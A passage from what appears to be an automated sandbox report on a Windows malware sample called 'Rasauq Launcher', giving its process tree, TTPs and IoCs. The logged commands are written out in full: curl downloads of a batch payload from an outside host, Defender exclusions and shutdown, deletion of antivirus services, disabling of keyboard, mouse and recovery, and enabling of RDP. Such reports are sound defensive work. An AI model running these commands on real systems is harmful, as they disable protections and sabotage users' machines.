PID 988 wrote to memory of 4732	988	cmd.exe	90
PID 988 wrote to memory of 4736	988	cmd.exe	91
PID 988 wrote to memory of 4736	988	cmd.exe	91
PID 3056 wrote to memory of 4940	3056	Rasauq SoftWorks.exe	94
PID 3056 wrote to memory of 4940	3056	Rasauq SoftWorks.exe	94
PID 4732 wrote to memory of 4936	4732	cmd.exe	96
PID 4732 wrote to memory of 4936	4732	cmd.exe	96
PID 4736 wrote to memory of 4976	4736	cmd.exe	97
PID 4736 wrote to memory of 4976	4736	cmd.exe	97
PID 4732 wrote to memory of 5056	4732	cmd.exe	99
PID 4732 wrote to memory of 5056	4732	cmd.exe	99
PID 4736 wrote to memory of 2648	4736	cmd.exe	101
PID 4736 wrote to memory of 2648	4736	cmd.exe	101
PID 4736 wrote to memory of 5240	4736	cmd.exe	105
PID 4736 wrote to memory of 5240	4736	cmd.exe	105
PID 4732 wrote to memory of 3964	4732	cmd.exe	106
PID 4732 wrote to memory of 3964	4732	cmd.exe	106
PID 3056 wrote to memory of 240	3056	Rasauq SoftWorks.exe	107
PID 3056 wrote to memory of 240	3056	Rasauq SoftWorks.exe	107
PID 3056 wrote to memory of 412	3056	Rasauq SoftWorks.exe	109
PID 3056 wrote to memory of 412	3056	Rasauq SoftWorks.exe	109
PID 4732 wrote to memory of 3348	4732	cmd.exe	204
PID 4732 wrote to memory of 3348	4732	cmd.exe	204
PID 4732 wrote to memory of 2908	4732	cmd.exe	112
PID 4732 wrote to memory of 2908	4732	cmd.exe	112
PID 4732 wrote to memory of 2396	4732	cmd.exe	206
PID 4732 wrote to memory of 2396	4732	cmd.exe	206
PID 4732 wrote to memory of 1940	4732	cmd.exe	114
PID 4732 wrote to memory of 1940	4732	cmd.exe	114
PID 4732 wrote to memory of 2672	4732	cmd.exe	218
PID 4732 wrote to memory of 2672	4732	cmd.exe	218
PID 3056 wrote to memory of 1868	3056	Rasauq SoftWorks.exe	116
PID 3056 wrote to memory of 1868	3056	Rasauq SoftWorks.exe	116
PID 4736 wrote to memory of 2436	4736	cmd.exe	117
PID 4736 wrote to memory of 2436	4736	cmd.exe	117
PID 4732 wrote to memory of 396	4732	cmd.exe	119
PID 4732 wrote to memory of 396	4732	cmd.exe	119
PID 4736 wrote to memory of 3276	4736	cmd.exe	120
PID 4736 wrote to memory of 3276	4736	cmd.exe	120
PID 4732 wrote to memory of 3580	4732	cmd.exe	222
PID 4732 wrote to memory of 3580	4732	cmd.exe	222
PID 4736 wrote to memory of 3960	4736	cmd.exe	122
PID 4736 wrote to memory of 3960	4736	cmd.exe	122
PID 4732 wrote to memory of 3396	4732	cmd.exe	123
PID 4732 wrote to memory of 3396	4732	cmd.exe	123
PID 4732 wrote to memory of 1732	4732	cmd.exe	124
PID 4732 wrote to memory of 1732	4732	cmd.exe	124
PID 4736 wrote to memory of 4552	4736	cmd.exe	125
PID 4736 wrote to memory of 4552	4736	cmd.exe	125
PID 4736 wrote to memory of 468	4736	cmd.exe	126
PID 4736 wrote to memory of 468	4736	cmd.exe	126
PID 4736 wrote to memory of 4020	4736	cmd.exe	127
PID 4736 wrote to memory of 4020	4736	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
2112	attrib.exe
4316	attrib.exe

cURL User-Agent 64 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	459	curl/8.7.1
HTTP User-Agent header	147	curl/8.7.1
HTTP User-Agent header	376	curl/8.7.1
HTTP User-Agent header	506	curl/8.7.1
HTTP User-Agent header	145	curl/8.7.1
HTTP User-Agent header	214	curl/8.7.1
HTTP User-Agent header	227	curl/8.7.1
HTTP User-Agent header	244	curl/8.7.1
HTTP User-Agent header	262	curl/8.7.1
HTTP User-Agent header	270	curl/8.7.1
HTTP User-Agent header	339	curl/8.7.1
HTTP User-Agent header	470	curl/8.7.1
HTTP User-Agent header	155	curl/8.7.1
HTTP User-Agent header	92	curl/8.7.1
HTTP User-Agent header	330	curl/8.7.1
HTTP User-Agent header	402	curl/8.7.1
HTTP User-Agent header	415	curl/8.7.1
HTTP User-Agent header	232	curl/8.7.1
HTTP User-Agent header	277	curl/8.7.1
HTTP User-Agent header	282	curl/8.7.1
HTTP User-Agent header	315	curl/8.7.1
HTTP User-Agent header	362	curl/8.7.1
HTTP User-Agent header	104	curl/8.7.1
HTTP User-Agent header	187	curl/8.7.1
HTTP User-Agent header	377	curl/8.7.1
HTTP User-Agent header	411	curl/8.7.1
HTTP User-Agent header	191	curl/8.7.1
HTTP User-Agent header	240	curl/8.7.1
HTTP User-Agent header	265	curl/8.7.1
HTTP User-Agent header	343	curl/8.7.1
HTTP User-Agent header	468	curl/8.7.1
HTTP User-Agent header	543	curl/8.7.1
HTTP User-Agent header	544	curl/8.7.1
HTTP User-Agent header	87	curl/8.7.1
HTTP User-Agent header	200	curl/8.7.1
HTTP User-Agent header	399	curl/8.7.1
HTTP User-Agent header	428	curl/8.7.1
HTTP User-Agent header	553	curl/8.7.1
HTTP User-Agent header	114	curl/8.7.1
HTTP User-Agent header	233	curl/8.7.1
HTTP User-Agent header	299	curl/8.7.1
HTTP User-Agent header	314	curl/8.7.1
HTTP User-Agent header	340	curl/8.7.1
HTTP User-Agent header	484	curl/8.7.1
HTTP User-Agent header	492	curl/8.7.1
HTTP User-Agent header	183	curl/8.7.1
HTTP User-Agent header	208	curl/8.7.1
HTTP User-Agent header	425	curl/8.7.1
HTTP User-Agent header	144	curl/8.7.1
HTTP User-Agent header	157	curl/8.7.1
HTTP User-Agent header	311	curl/8.7.1
HTTP User-Agent header	502	curl/8.7.1
HTTP User-Agent header	509	curl/8.7.1
HTTP User-Agent header	81	curl/8.7.1
HTTP User-Agent header	141	curl/8.7.1
HTTP User-Agent header	213	curl/8.7.1
HTTP User-Agent header	274	curl/8.7.1
HTTP User-Agent header	359	curl/8.7.1
HTTP User-Agent header	408	curl/8.7.1
HTTP User-Agent header	74	curl/8.7.1
HTTP User-Agent header	319	curl/8.7.1
HTTP User-Agent header	221	curl/8.7.1
HTTP User-Agent header	260	curl/8.7.1
HTTP User-Agent header	174	curl/8.7.1

C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:60
- C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1868
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5108
- C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2112
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE9A4.tmp.bat""
    3⤵
    PID:2824
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1792
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:1464
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:3120
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3144
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
        5⤵
        
        PID:4388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4400
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:988
- - C:\Windows\system32\curl.exe
    curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:4776
- - C:\Windows\system32\curl.exe
    curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:4936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:5056
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:3964
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3348
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:2908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:2396
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:1940
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:2672
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:396
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:3580
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:3396
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1732
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:2732
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:6048
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5436
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:2600
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:2468
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:5608
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:3776
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:972
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:6120
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4260
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:5844
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:1656
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:4648
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:5132
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:1064
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4168
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3516
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      PID:1284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6088
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:5656
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:1888
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:300
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:3900
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:4756
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5072
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:1788
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4780
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:4304
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:3104
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:1520
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5320
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6008
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4988
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2396
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:6076
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:5476
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:5864
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:4364
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:2260
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3780
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2672
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:4604
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:3580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2892
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4192
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4216
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      PID:5352
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      PID:5932
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      PID:3604
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      PID:3940
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      PID:4432
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:4880
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:6136
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:2372
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      PID:4976
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:5692
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:3924
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:6044
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:5384
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:5076
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:4784
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:3472
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:4388
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:4324
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:4716
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:1764
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      PID:5052
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      PID:544
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      PID:1064
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      PID:4400
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      PID:312
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      PID:2796
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      PID:2968
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      PID:1660
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      PID:2532
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:1032
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:2396
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      PID:5544
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:4292
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:480
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:5864
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:1988
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:4364
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:1140
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:3780
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      PID:2436
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:5576
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      PID:4604
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      PID:5648
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      Launches sc.exe
      PID:1308
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:4056
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:2868
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:1172
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:4396
  - - C:\Windows\system32\reg.exe
